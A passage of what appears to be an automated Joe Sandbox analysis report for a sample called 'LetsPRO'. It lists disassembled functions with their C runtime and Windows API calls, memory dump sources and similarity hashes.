                                        • _errno.MSVCR100(?,?,6C912BD0,0000000C), ref: 6C928D5A
                                        • _invalid_parameter_noinfo.MSVCR100(?,?,6C912BD0,0000000C), ref: 6C928D65
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: _errno_fread_nolock_s_invalid_parameter_noinfo_lock_lock_file_memset_unlock_filememcpy_s
                                        • String ID:
                                        • API String ID: 3226975504-0
                                        • Opcode ID: 4c2332346bf10a52720509bf36dcafa5c8f31075ee3d6b95051d576fb6143bc2
                                        • Instruction ID: 3cfefb21fd6d8b9fe1b029063dd8a09e3ffb714b89c85dcb3e6cd95e71c74ff7
                                        • Opcode Fuzzy Hash: 4c2332346bf10a52720509bf36dcafa5c8f31075ee3d6b95051d576fb6143bc2
                                        • Instruction Fuzzy Hash: DC015E31805A1EEBDF11AF94C8099CE3F70AF26758F104526F83415AA1D735CA69DFD1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • _errno.MSVCR100(?,?,?,6C97DBA9,00000000,?,00000000), ref: 6C97EF6E
                                        • _invalid_parameter_noinfo.MSVCR100(?,?,?,6C97DBA9,00000000,?,00000000), ref: 6C97EF78
                                          • Part of subcall function 6C97B066: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6C94B73F,?,6C94C2BB,00000003,6C9274E4,6C90A988,0000000C,6C927537,00000001,00000001), ref: 6C97B06D
                                        • __get_sys_err_msg.LIBCMT ref: 6C97EF91
                                        • strncpy_s.MSVCR100(?,?,00000000,?,?,?,?,6C97DBA9,00000000,?,00000000), ref: 6C97EF9C
                                        • __invoke_watson.LIBCMT(00000000,00000000,00000000,00000000,00000000), ref: 6C97EFAD
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: __get_sys_err_msg__invoke_watson_errno_invalid_parameter_invalid_parameter_noinfostrncpy_s
                                        • String ID:
                                        • API String ID: 161604870-0
                                        • Opcode ID: bddcaf0d0cb55db978c93973166e3f97a4275fe0d238cf78bab95a0254b5a0a8
                                        • Instruction ID: a65aa59af311ed5f4a0a81d2710243bb991b2221327d24494af0a82c07545569
                                        • Opcode Fuzzy Hash: bddcaf0d0cb55db978c93973166e3f97a4275fe0d238cf78bab95a0254b5a0a8
                                        • Instruction Fuzzy Hash: E4F0A732501118AFA7216F55CC048EE7B6CEFA16A8B100025FD2C86E10EB32D95596F0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • _control87.MSVCR100(00000001,?,00000000,?,6C94CD83,00000000,00010000,00030000,?,6C931DBE,?,6C90C484,?,?,6C90B961,00000000), ref: 6C90C433
                                        • _control87.MSVCR100(00000000,00000000,00000000,?,6C94CD83,00000000,00010000,00030000,?,6C931DBE,?,6C90C484,?,?,6C90B961,00000000), ref: 6C932523
                                        • _errno.MSVCR100(00000000,?,6C94CD83,00000000,00010000,00030000,?,6C931DBE,?,6C90C484,?,?,6C90B961,00000000), ref: 6C93252C
                                        • _invalid_parameter_noinfo.MSVCR100(00000000,?,6C94CD83,00000000,00010000,00030000,?,6C931DBE,?,6C90C484,?,?,6C90B961,00000000), ref: 6C932536
                                        • _control87.MSVCR100(00000001,?,00000000,?,6C94CD83,00000000,00010000,00030000,?,6C931DBE,?,6C90C484,?,?,6C90B961,00000000), ref: 6C932542
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: _control87$_errno_invalid_parameter_noinfo
                                        • String ID:
                                        • API String ID: 1498936549-0
                                        • Opcode ID: be07e889d2b5ed1670540ae892ce49ea797300f69d60ed3802b921b155d01b2f
                                        • Instruction ID: 67a0a4f4162bea9b970338252431c090d37230e78b2e0b37a20cc5d53a540c06
                                        • Opcode Fuzzy Hash: be07e889d2b5ed1670540ae892ce49ea797300f69d60ed3802b921b155d01b2f
                                        • Instruction Fuzzy Hash: 0DF0B4327487649BD7252EB89801BDA73D8EF24B24F14051DF9589FB81DB71D90086F9
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • _errno.MSVCR100 ref: 6C95A045
                                        • _invalid_parameter_noinfo.MSVCR100 ref: 6C95A050
                                          • Part of subcall function 6C97B066: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6C94B73F,?,6C94C2BB,00000003,6C9274E4,6C90A988,0000000C,6C927537,00000001,00000001), ref: 6C97B06D
                                        • _errno.MSVCR100 ref: 6C95A070
                                        • _localtime64_s.MSVCR100(?,?), ref: 6C95A082
                                          • Part of subcall function 6C916964: _memset.LIBCMT(?,000000FF,00000024), ref: 6C91698D
                                          • Part of subcall function 6C916964: _get_daylight.MSVCR100(?), ref: 6C9169C9
                                          • Part of subcall function 6C916964: _get_dstbias.MSVCR100(?), ref: 6C9169DB
                                          • Part of subcall function 6C916964: _get_timezone.MSVCR100(?), ref: 6C9169ED
                                          • Part of subcall function 6C916964: _gmtime64_s.MSVCR100(?,?), ref: 6C916A21
                                        • _asctime.LIBCMT(?), ref: 6C95A091
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: _errno$_asctime_get_daylight_get_dstbias_get_timezone_gmtime64_s_invalid_parameter_invalid_parameter_noinfo_localtime64_s_memset
                                        • String ID:
                                        • API String ID: 2020581482-0
                                        • Opcode ID: e21d9b8c349808c3d69a264e4c338ccf44c1e0d0eacdf7c15b48cdde81b60fe2
                                        • Instruction ID: 059f8c82acd171c7fb4550c83c3d795863c0200fd0f1eda609b93866fcfee028
                                        • Opcode Fuzzy Hash: e21d9b8c349808c3d69a264e4c338ccf44c1e0d0eacdf7c15b48cdde81b60fe2
                                        • Instruction Fuzzy Hash: 4BF01931A14208DEDB40DFB5D8447AE37B8AF2A31CF841559C405DBA90EF30D958DB79
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • _errno.MSVCR100 ref: 6C95AF72
                                        • _invalid_parameter_noinfo.MSVCR100 ref: 6C95AF7D
                                          • Part of subcall function 6C97B066: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6C94B73F,?,6C94C2BB,00000003,6C9274E4,6C90A988,0000000C,6C927537,00000001,00000001), ref: 6C97B06D
                                        • _errno.MSVCR100 ref: 6C95AF95
                                        • __localtime32_s.LIBCMT(?,?), ref: 6C95AFA7
                                          • Part of subcall function 6C9596EC: _errno.MSVCR100(?,?,?,?), ref: 6C959708
                                          • Part of subcall function 6C9596EC: _invalid_parameter_noinfo.MSVCR100(?,?,?,?), ref: 6C959712
                                        • __wasctime.LIBCMT(?), ref: 6C95AFB6
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: _errno$_invalid_parameter_noinfo$__localtime32_s__wasctime_invalid_parameter
                                        • String ID:
                                        • API String ID: 2302537511-0
                                        • Opcode ID: 2b7f52e6052a463e8f2ede5a8297828755422044e471a7265a10c446bbc6816b
                                        • Instruction ID: 8886f39765e89c3f923bcaa5ab7955306f92236781d7426d96b7e0d473b6b08a
                                        • Opcode Fuzzy Hash: 2b7f52e6052a463e8f2ede5a8297828755422044e471a7265a10c446bbc6816b
                                        • Instruction Fuzzy Hash: 37F090B0608209DFDB00DFA9D840BDE77F8AF29328F900459D800D7A80EF35D9689778
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                          • Part of subcall function 6C94AB51: CreateThread.KERNEL32(00000000,-00000018,6C940F33,00010000,6C940F21,?), ref: 6C94AB8D
                                          • Part of subcall function 6C94AB51: GetLastError.KERNEL32 ref: 6C94AB97
                                          • Part of subcall function 6C94AB51: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(00000000), ref: 6C94ABAF
                                          • Part of subcall function 6C94AB51: _CxxThrowException.MSVCR100(?,6C9A0D48,00000000), ref: 6C94ABBD
                                        • GetLastError.KERNEL32 ref: 6C93BBE7
                                        • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(00000000), ref: 6C93BBFF
                                        • _CxxThrowException.MSVCR100(?,6C9A0D48,00000000), ref: 6C93BC0D
                                        • SetThreadPriority.KERNEL32(00000000,0000000F), ref: 6C93BC15
                                        • GetLastError.KERNEL32 ref: 6C93BC1F
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: ErrorLast$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorExceptionThreadThrow$CreatePriority
                                        • String ID:
                                        • API String ID: 3804766065-0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • __doserrno.MSVCR100(?,6C9786AC,?,?,?,?,?,?,6C92FE52,?,00000000,00000000,00000002,?,00000002,?), ref: 6C90A6F0
                                        • __doserrno.MSVCR100(?,6C9786AC,?,?,?,?,?,?,6C92FE52,?,00000000,00000000,00000002,?,00000002,?), ref: 6C93047E
                                        • _errno.MSVCR100(?,6C9786AC,?,?,?,?,?,?,6C92FE52,?,00000000,00000000,00000002,?,00000002,?), ref: 6C930486
                                        • _errno.MSVCR100(?,6C9786AC,?,?,?,?,?,?,6C92FE52,?,00000000,00000000,00000002,?,00000002,?), ref: 6C930499
                                        • _invalid_parameter_noinfo.MSVCR100(?,6C9786AC,?,?,?,?,?,?,6C92FE52,?,00000000,00000000,00000002,?,00000002,?), ref: 6C9304A4
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: __doserrno_errno$_invalid_parameter_noinfo
                                        • String ID:
                                        • API String ID: 2315031519-0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • _errno.MSVCR100 ref: 6C953D7F
                                        • _invalid_parameter_noinfo.MSVCR100 ref: 6C953D8A
                                          • Part of subcall function 6C97B066: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6C94B73F,?,6C94C2BB,00000003,6C9274E4,6C90A988,0000000C,6C927537,00000001,00000001), ref: 6C97B06D
                                        • _errno.MSVCR100 ref: 6C953D9C
                                        • _invalid_parameter_noinfo.MSVCR100 ref: 6C953DA7
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: _errno_invalid_parameter_noinfo$_invalid_parameter
                                        • String ID:
                                        • API String ID: 1328987296-0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                          • Part of subcall function 6C93B79F: __EH_prolog3.LIBCMT ref: 6C93B7A6
                                        • TlsAlloc.KERNEL32 ref: 6C940103
                                        • GetLastError.KERNEL32 ref: 6C940113
                                        • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(00000000), ref: 6C94012C
                                        • _CxxThrowException.MSVCR100(00000000,6C9A0D48,00000000), ref: 6C94013B
                                        • Concurrency::details::UMSThreadScheduler::OneShotStaticConstruction.LIBCMT ref: 6C940140
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: AllocConcurrency::details::Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorConstructionErrorExceptionH_prolog3LastScheduler::ShotStaticThreadThrow
                                        • String ID:
                                        • API String ID: 3767078539-0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • __startOneArgErrorHandling.LIBCMT ref: 6C8F44ED
                                          • Part of subcall function 6C918940: __87except.LIBCMT ref: 6C91897B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: ErrorHandling__87except__start
                                        • String ID: pow
                                        • API String ID: 2905807303-2276729525
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • ??_U@YAPAXI@Z.MSVCR100(00000000,?,?,00000000,?,00000000), ref: 6C93D0A2
                                        • _memset.LIBCMT(00000000,00000000,?,00000000,?,?,00000000,?,00000000), ref: 6C93D0B5
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: _memset
                                        • String ID: $$,
                                        • API String ID: 2102423945-53852779
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • DName::DName.LIBCMT ref: 6C92EFB0
                                        • DName::operator+.LIBCMT ref: 6C92EFB7
                                          • Part of subcall function 6C90DE3B: DName::operator+.LIBCMT ref: 6C90DEF9
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: Name::operator+$NameName::
                                        • String ID: CV:
                                        • API String ID: 168861036-3725821052
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • ?_inconsistency@@YAXXZ.MSVCR100(E06D7363,1FFFFFFF,19930522), ref: 6C974052
                                          • Part of subcall function 6C973954: DecodePointer.KERNEL32(6C973990,00000008,6C9744B7,6C9744D8,0000000C,6C97452F,?,?,00000003,00000000,6C974588,00000008,6C92CB7F,?,00000000,00000003), ref: 6C973966
                                          • Part of subcall function 6C973954: ?terminate@@YAXXZ.MSVCR100(?,00000000,00000003,?), ref: 6C973986
                                        • ?terminate@@YAXXZ.MSVCR100(E06D7363,1FFFFFFF,19930522), ref: 6C974059
                                          • Part of subcall function 6C9738EA: _getptd.MSVCR100(6C973928,00000008,6C97398B,?,00000000,00000003,?), ref: 6C9738F6
                                          • Part of subcall function 6C9738EA: _abort.LIBCMT(6C973928,00000008,6C97398B,?,00000000,00000003,?), ref: 6C973918
                                        • __TypeMatch.MSVCR100(1FFFFFFF,00000000,?,6C932778,00000000,E06D7363,1FFFFFFF,19930522), ref: 6C97408D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: ?terminate@@$?_inconsistency@@DecodeMatchPointerType_abort_getptd
                                        • String ID: csm
                                        • API String ID: 2680980455-1018135373
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: _errno_invalid_parameter_noinfo_wcslen
                                        • String ID: I
                                        • API String ID: 3151729805-3707901625
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: _errno_invalid_parameter_noinfo_strlen
                                        • String ID: I
                                        • API String ID: 1245117036-3707901625
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • ?_inconsistency@@YAXXZ.MSVCR100(?,00000000,?,00000000,00000000), ref: 6C974115
                                          • Part of subcall function 6C973954: DecodePointer.KERNEL32(6C973990,00000008,6C9744B7,6C9744D8,0000000C,6C97452F,?,?,00000003,00000000,6C974588,00000008,6C92CB7F,?,00000000,00000003), ref: 6C973966
                                          • Part of subcall function 6C973954: ?terminate@@YAXXZ.MSVCR100(?,00000000,00000003,?), ref: 6C973986
                                        • ?_inconsistency@@YAXXZ.MSVCR100(?,00000000,?,00000000,00000000), ref: 6C974120
                                        • ?_inconsistency@@YAXXZ.MSVCR100(?,00000000,?,00000000,00000000), ref: 6C97414B
                                        • ?raw_name@type_info@@QBEPBDXZ.MSVCR100(0000005E,?,00000000,?,00000000,00000000), ref: 6C974169
                                        • strcmp.MSVCR100(00000000,0000005E,?,00000000,?,00000000,00000000), ref: 6C97416F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: ?_inconsistency@@$?raw_name@type_info@@?terminate@@DecodePointerstrcmp
                                        • String ID: csm
                                        • API String ID: 2672297707-1018135373
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • _errno.MSVCR100 ref: 6C97EBE7
                                        • _invalid_parameter_noinfo.MSVCR100 ref: 6C97EBF2
                                          • Part of subcall function 6C97B066: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6C94B73F,?,6C94C2BB,00000003,6C9274E4,6C90A988,0000000C,6C927537,00000001,00000001), ref: 6C97B06D
                                        • _errno.MSVCR100 ref: 6C97EC0B
                                        • _invalid_parameter_noinfo.MSVCR100 ref: 6C97EC16
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: _errno_invalid_parameter_noinfo$_invalid_parameter
                                        • String ID:
                                        • API String ID: 1328987296-0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: _errno_invalid_parameter_noinfo
                                        • String ID:
                                        • API String ID: 2959964966-0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • IsValidCodePage.KERNEL32(-00000030,00000000,?,00000000), ref: 6C90C0FF
                                        • GetCPInfo.KERNEL32(00000000,?), ref: 6C90C112
                                        • _memset.LIBCMT(0000001D,00000000,00000101), ref: 6C90C12A
                                        • _memset.LIBCMT(0000001D,00000000,00000101,00000000,?,00000000), ref: 6C92A93D
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: _memset$CodeInfoPageValid
                                        • String ID:
                                        • API String ID: 1608968462-0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • ??_U@YAPAXI@Z.MSVCR100(00000000,00000000), ref: 6C936E12
                                        • _memset.LIBCMT(00000000,00000000,?,00000000,00000000), ref: 6C936E25
                                        • ??2@YAPAXI@Z.MSVCR100(0000000C,00000000,00000000,?,00000000,00000000), ref: 6C936E2C
                                        • ?_SpinOnce@?$_SpinWait@$00@details@Concurrency@@QAE_NXZ.MSVCR100(?,?,?,?,?,00000000), ref: 6C936E77
                                        Memory Dump Source
